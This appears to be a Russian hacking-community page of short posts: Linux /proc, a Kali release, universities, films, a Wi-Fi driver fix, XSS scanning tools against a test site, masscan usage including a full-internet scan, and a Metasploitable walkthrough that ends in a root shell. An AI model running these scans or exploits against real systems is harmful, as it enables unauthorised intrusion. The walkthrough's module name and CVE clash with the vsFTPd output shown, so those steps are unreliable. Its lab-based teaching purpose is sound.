Сообщество - Life-Hack [Жизнь-Взлом]/Хакинг

Life-Hack [Жизнь-Взлом]/Хакинг

274 поста 2 805 подписчиков

Популярные теги в сообществе:

Специализированная файловая система proc

Файловая система proc является важным источником информации о вашей Linux-системе, который ни в коем случае нельзя игнорировать.

Proc является псевдо- или виртуальной файловой системой, которая предоставляет пользователям доступ к внутренним структурам ядра Linux.

Иначе говоря, proc не является реальной файловой системой в обычном смысле; она располагается исключительно в оперативной памяти. При этом она автоматически монтируется системой.

Ниже приведены важные файлы, относящиеся к процессам

Вы можете использовать следующие файлы файловой системы proc для получения информации об отдельных процессах:

/proc/$pid/cmdline — содержит параметры командной строки, переданные на этапе запуска процесса

/proc/$pid/cwd — является символьной ссылкой на текущую рабочую директорию процесса

/proc/$pid/environ — содержит переменные окружения, заданные на этапе запуска процесса

/proc/$pid/exe — является символьной ссылкой на исполненный бинарный файл

/proc/$pid/fd — поддиректория с символьными ссылками на файлы, открытые процессом

/proc/$pid/io — содержит статистику операций ввода/вывода процесса

/proc/$pid/limits — содержит информацию о лимитах использования ресурсов процессом

/proc/$pid/maps — содержит информацию об отображенных регионах памяти и правах доступа к ним

/proc/$pid/stack — содержит трассировку вызовов функций в рамках стека ядра

/proc/$pid/stat — содержит статистику использования ресурсов процессом

/proc/$pid/task/ — является директорией с информацией о программных потоках

Важные файлы, относящиеся к системе

А это список важных файлов, не относящихся к отдельным процессам:

▪/proc/cmdline — содержит аргументы, переданные ядру Linux

▪/proc/cpuinfo — содержит информацию о центральном процессоре

▪/proc/meminfo — содержит информацию об оперативной памяти

▪/proc/filesystems — содержит информацию о поддерживаемых ядром файловых системах

▪/proc/modules — содержит информацию о загруженных модулях ядра

▪/proc/partitions — содержит информацию дисковых разделах

▪/proc/swaps — содержит информацию о пространстве подкачки

▪/proc/self — содержит информацию о процессе, работающем с файловой системой proc

▪/proc/slabinfo — содержит информацию о кэшах ядра Linux

▪/proc/sys — содержит различные файлы и поддиректории, отражающие значения внутренних переменных ядра Linux

Мы в телеграме!

Показать полностью
0

Вышел Kali Linux 2023.2

Вышел Kali Linux 2023.2

Обновления Kali Linux включают:

▪новый образ виртуальной машины для Hyper-V. Это образ GEN2 для Hyper-V с расширенным режимом сеанса, в котором предварительно настроен xRDP через Hvsocket. Пользователи могут загрузить образ и запустить скрипт install-vm.bat для установки Kali на Hyper-V;

▪аудиостек Xfce вместо Pipewire. Это должно улучшить качество звучания для пользователей;

▪обновление рабочего стола i3. Ранее i3 был доступен в метапакете «kali-desktop-i3» вместе с «i3-gaps» в метапакете «kali-desktop-i3-gaps». Теперь два метапакета объединили в один — «kali-desktop-i3», который обеспечит полную поддержку i3. Новый рабочий стол получит новый тип экрана блокировки, меню включения / выключения, плавающие окна и некоторые анимации;

▪GNOME 44. Новая версия GNOME предлагает улучшенную панель быстрых настроек, быстрое отключение или подключение к устройству Bluetooth, обновлённое приложение настроек, программу выбора файлов GNOME с миниатюрами, обновление темы Kali;

▪новые меню и иконки. Разработчики улучшили дизайн системы, обновив внешний вида меню и представив множество новых иконок;

▪новые инструменты. В файловом менеджере Xfce внедрили функцию с новым расширением под названием GtkHash. Теперь пользователи смогут вычислять хэши прямо в свойствах файлов. Отдельная вкладка под названием «Контрольные суммы» делает необязательным использование терминала для вычисления хэшей;

▪дистрибутив Tiling Assistant, который улучшил возможности многооконности. Он предоставляет удобную привязку окон, поддержку нескольких мониторов, настраиваемые сочетания клавиш и персонализированные настройки.

Выпуск Kali включает набор новых инструментов:

▪Cilium-cli — средство установки, управления и устранения неполадок Kubernetes;

▪Cosign — инструмент подписи контейнеров;

▪Eksctl — официальный интерфейс командной строки сервиса Amazon Elastic Kubernetes;

▪Evilginx — MITM-фреймворк, используемый для фишинговых атак;

▪GoPhish — фишинговый инструментарий;

▪Humble — анализатор HTTP-заголовков;

▪Slim (toolkit) — уменьшитель образа контейнера вместо его изменения;

▪Syft — инструмент для составления счетов за программное обеспечение из образов контейнеров и файловых систем;

▪Terraform — улучшение, изменение и создание инфраструктуры;

▪Tetragon — безопасность на основе eBPF (расширенный фильтр пакетов Berkeley) и принудительное применение во время выполнения;

▪TheHive — бесплатная платформа реагирования на инциденты безопасности с открытым исходным кодом;

▪Trivy — инструмент для поиска уязвимостей, секретов, неправильных настроек, SBOM в контейнере, Kubernetes, репозиториях, облаках и т.д.;

▪Wsgidav — WSGI на базе универсального и масштабируемого WebDAV-сервера (Web Server Gateway Interface).

▪Некоторые прежние инструменты Kali также обновили.

Новые пользователи могут скачать дистрибутив с официального сайта. Те, у кого установлена Kali Linux, могут выполнить быстрое обновление с помощью следующего перечня команд:

┌──(kali㉿kali)-[~]

└─$ echo «deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware» | sudo tee /etc/apt/sources.list

[…]

┌──(kali㉿kali)-[~]

└─$ sudo apt update && sudo apt -y full-upgrade

[…]

┌──(kali㉿kali)-[~]

└─$ cp -vrbi /etc/skel/. ~/

[…]

┌──(kali㉿kali)-[~]

└─$ [ -f /var/run/reboot-required ] && sudo reboot -f

Источник
Мы в телеграме!

Показать полностью

5 лучших вузов для программистов в 2023-2024

1. Университет Иннополис

Есть возможность получения 100% гранта, 100% трудоустройство выпускников.

Средний проходной балл ЕГЭ (2022): 99,0 (бюджет)

Стоимость платного обучения: от 800 000 рублей в год

2. Московский физико–технический институт

Есть собственная система подготовки, совмещающая обучение студентов с их практикой в компаниях–партнерах университета.

Средний проходной балл ЕГЭ (2022): 97,1 (бюджет) и 93,8 (контракт)

Стоимость платного обучения: от 389 000 рублей в год

3. Национальный исследовательский университет «Высшая школа экономики»

Используют модель Major–Minor, что позволяет составить индивидуальный план обучения для каждого студента.

Средний проходной балл ЕГЭ (2022): 95,1 (бюджет) и 83,9 (контракт)

Стоимость платного обучения: от 320 000 рублей в год

4. Национальный исследовательский университет ИТМО

В ИТМО используются специализированные акселераторы, бизнес-инкубатор и Инжиниринговый центр «M2M телемеханика и приборостроение».

Средний проходной балл ЕГЭ (2022): 93,7 (бюджет) и 78,1 (контракт)

Стоимость платного обучения: от 289 000 рублей в год

5. Национальный исследовательский ядерный университет «МИФИ»

Сотрудничают с международными компаниями, устраивают стажировки за рубежом.

Средний проходной балл ЕГЭ (2022): 91,4 (бюджет) и 77,0 (контракт)

Стоимость платного обучения: от 80 400 рублей в год

Мы в телеграме!
Книги по программированию бесплатно!

Показать полностью

10 фильмов о хакерах

Наша подборка отличных фильмов, приятного просмотра!


Cambridge Analytica. Скандальный взлом (2019) – Кинопоиск: 6.5, IMDB: 7.0

Мы крадем секреты: История WikiLeaks (2013) – Кинопоиск: 7.4, IMDB: 6.9

Интернет-мальчик: История Аарона Шварца (2014) – Кинопоиск: 7.8, IMDB: 8.0

Citizenfour: Правда Сноудена (2014) – Кинопоиск: 7.3, IMDB: 8.0

Сноуден (2016) – Кинопоиск: 7.0, IMDB: 7.3

Кто я (2014) – Кинопоиск: 7.4, IMDB: 7.5

Особое мнение (2002) – Кинопоиск: , IMDB: 7.6

Реалити (2023) – IMDB: 6.7

Призрак в доспехах (1995) – Кинопоиск: 8.0, IMDB: 7.9

Офисное пространство (1999) – Кинопоиск: 6.8, IMDB: 7.6

Мы в телеграме!

Kali Linux не видит Wi-Fi адаптер, что делать?

Что делать, когда Kali Linux не видит Wi-Fi адаптер. Данная проблема часто появляется при подключении адаптера WiFi к стационарному ПК.

Для решения этой проблемы необходимо какое-то временное подключение к сети для скачивания и установки драйвера. Большая часть ноутбуков работает с драйверами Broadcom. Чтобы облегчить установку драйвера Broadcom будем использовать скрипт Broadcom.

Итак, мы подключились к сети используя другой адаптер или кабель LAN. Теперь откройте терминал и обновите Kali Linux с помощью команды apt update:

sudo apt-get update

Вам потребуется пароль root.

После обновления используйте команду git clone для клонирования скрипта Broadcom.

git clone https://github.com/mehedishakeel/BroadcomInstaller2017

После клонирования переходим в папку с помощью команды cd:

cd BroadcomInstaller2017

Затем перед запуском скрипта bash, с помощью следующей команды, изменяем права доступа:

sudo chmod +x Broadcom.sh

Теперь запускаем скрипт bash:

sudo bash Broadcom.sh

Выбираем первый пункт (1) Install WiFi Driver (Установить драйвер WiFi).

Kali Linux не видит Wi-Fi адаптер

Установка драйвера Broadcom для Wi-Fi адаптера на Kali Linux займет некоторое (зависит от вашего ПК и скорости интернета).

После завершения установки скрипт перезагрузит компьютер. Так что не пугайтесь, если компьютер перезапустится сам автоматически.

После загрузки Kali Linux вы должны увидеть в правом верхнем углу иконку подключения по Wi-Fi. Теперь можете подключиться к сетям WiFi.

Мы в телеграме!

Показать полностью
1

Автоматизация поиска XSS уязвимостей

Участвуя в программе вознаграждения Баг Баунти, часто приходится искать XSS-язвимости сайтов. Сегодня обсудим несколько полезных инструментов для автоматизация поиска XSS-уязвимостей в веб-приложениях.

Автоматизация поиска XSS уязвимостей

В качестве цели, чтобы не нарушать закон, будем использовать специально предназначенный для этого уязвимый сайт:

http://testphp.vulnweb.com/

Итак, рассмотрим лучшие инструменты для автоматизация поиска XSS-уязвимостей в веб-приложениях.

Bug Bounty — это программа, которую владелец сайта проводит для привлечения сторонних специалистов к поиску уязвимостей. При участии в программе Баг Баунти нужно действовать этично и придерживаться установленных правил. Не стоит забывать, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление.

Это инструмент Python, который используется для поиска параметров сайта в веб-архиве без взаимодействия с хостом. Для поиска параметров, ParamSpider использует различные методы и списки слов.

Тулза будер полезна при поиске XSS, SQL-инъекций, SSRF и уязвимостей Open Redirect.

Установка Paramspider

Для установки Paramspider, используйте следующие команды:

git clone https://github.com/devanshbatham/ParamSpider

cd ParamSpider

pip3 install -r requirements.txt

Если не получается установить, убедитесь, что у вас установлен Python 3 и Git.

Использование Paramspider

Для поиска XSS, выполняем команду:

python3 paramspider.py --domain http://testphp.vulnweb.com/ -o /home/media/vuln.txt

Эта команда запускает сценарий Python и сканирует цель. Полученные результаты сохраняет в текстовый файл.

Официальная страница Paramspider на GitHub:

https://github.com/devanshbatham/ParamSpider

Kxss

Ищет XSS на основе результатов найденных параметров из Waybackurls или Burp.

Установка Kxss

Для работы программы, необходимо установить Golang.

Для установки, используем команду:

go get github.com/Emoe/kxss

Использование Kxss

Вы можете запустить скрипт подсунув файл найденных параметров Paramaspider:

cat vuln.txt | kxss

Официальная страница Kxss на GitHub:

https://github.com/Emoe/kxss

Dalfox

DalFox — это мощный инструмент для поиска XSS., Также анализатор параметров и утилита, которые ускоряют процесс обнаружения XSS.

Основная концепция заключается в анализе параметров, поиске XSS и проверке их на основе синтаксического анализатора DOM.

Установка Dalfox

Можно установить Dalfox с помощью snap:

snap install dalfox

Использование Dalfox

Чтобы запустить скрипт и найти XSS-уязвимости на сайте, выполните команду:

cat vuln.txt | kxss | dalfox pipe

Как мы видим, инструмент возвращает страницы со скрытыми параметрами (Reflected parameters).

Можно подсунуть полезную нагрузку:

Официальная страница Dalfox на GitHub:

https://github.com/hahwul/dalfox

Он-лайн сервис для поиска XSS уязвимостей

Можно также использовать онлайн-сервис pentest-tools.com/website-vulnerability-scanning/xss-..., который позволяет найти XSS веб-приложения, не устанавливая при этом никаких дополнительных инструментов. Просто вводите URL и получаете результат.

Информация предоставлена исключительно в ознакомительных целях!

Мы в телеграме!

Показать полностью
1

Правильное использование Masscan на Kali Linux

Что такое Masscan

Этот самый быстрый сканер портов дает результат, аналогичный Nmap, но Masscan работает как Unicornscan, внутри Zenmap (асинхронное сканирование). Это быстрее из-за гибкости, допускающей произвольные диапазоны и диапазоны портов.

Masscan использует собственный стек TCP/IP. Все, кроме простого сканирования портов, может вызвать конфликт с локальным стеком TCP/IP.

Установка Masscan на Linux

Masscan установлен в полной версии Kali Linux. Мы можем проверить основные варианты использования, выполнив команду:

masscan

Если в системе не установлен Masscan, тогда установите зависимости:

sudo apt-get install clang git gcc make libpcap-dev

И применив следующую команду, установите Masscan с помощью:

sudo apt-get install masscan

Или клонировать репозиторий GitHub.

git clone https://github.com/robertdavidgraham/masscan

cd masscan

sudo make

Как пользоваться Masscan

Masscan используется для сканирования сети, если необходимо просканировать только один порт:

sudo masscan 172.217.167.46 -p443

Команда выше начнет сканировать один порт 443.

Также можно использовать инструмент для сканирования нескольких портов, разделенных запятой (,):

sudo masscan 172.217.167.46 -p443,80,4444

Использование Masscan. Сканирование портов masscan

Для сканирования диапазона портов:

sudo masscan 172.217.167.46 -p12-443

Приведенная выше команда будет сканировать порт с 12 по 443.

Для сканирования всех портов:

sudo masscan 172.217.167.46 -p0-65535

Использование Masscan на полную катушку

Я говорил, что Masscan — самый быстрый сканер, но после выполнения предыдущих команд я не почувствовал, что он работает быстрее.

Причина в том, что Масскан, по умолчанию, сканирует со скоростью 100 пакетов в секунду (медленно). Чтобы увеличить скорость, нужно использовать параметр --rate:

sudo masscan 172.217.167.46 -p0-65535 --rate 25000000

Выполнив эту команду, мы сможем достичь максимальной скорости (25 миллионов пакетов в секунду).

Но имейте в виду. Скорость сканирования зависит от ОС. Вы не сможете разогнать сканер до максимальной скорости на системах Mac, Windows или на виртуальной машине Linux. Максимальная скорость при использовании ОС отличных от Linux — 300 000 пакетов в секунду.

Также скорость сканирования зависит подключение к Интернету.

В небольших сетях или при скандировании одного IP вы не заметите большую разницу. Чтобы увидеть весь потенциал инструмента, необходимо сканировать большую сеть.

По словам автора Роберта Грэма, Masscan может просканировать весь Интернет за 6 минут. Если мы хотим сканировать весь Интернет на наличие определенного порта (например, 443):

sudo masscan 0.0.0.0/0 -p443 --rate 250000000 --exclude 255.255.255.255

Как пользоваться Masscan. Сканирование интернет

Вот как можно найти конкретный уязвимый порт во всей сети Интернет.

Другое использование Masscan на Kali Linux

Чтобы сохранить результат вывода в файл, используйте команду:

sudo masscan 172.217.167.46 -p0-65535 > example.txt

Можно сохранять результат не только в формате txt, но и в форматах XML ( -oX), Grepable ( -oG) и JSON ( -oJ). Из-за совместимости с другими инструментами, я предпочитаю формат Grepable.

Если добавить параметр ‐top-ports 100, он будет сканировать 100 самых распространенных портов, обнаруженных в соответствии с Nmap:

sudo masscan 172.217.167.46 --top-ports 100 --rate 100000

Информация предоставлена исключительно в ознакомительных целях!

Мы в телеграме!

Показать полностью
3

Metasploitable: Пример атаки

Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable

Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер

Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap

Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он -  192.168.1.131.

#Начало сканирования

Пишем в kali linux следующую компанду:

💣sudo nmap -sV -Pn --script vulners 192.168.1.131

Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.

Флаг Pn означает, что мы не отправим  ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости

Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole

Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

💣search ftp

💣use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

💣Set payload payload/cmd/interact.

💣set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

Exploit

И видим следующее:

192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)

* 192.168.1.131:21 - USER: 331 Please specify the password.

+ 192.168.1.131:21 - Backdoor service has been spawned, handling...

+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)

* Found shell.

* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)

Информация предоставлена исключительно в ознакомительных целях!

Мы в телеграме!

Показать полностью
Отличная работа, все прочитано!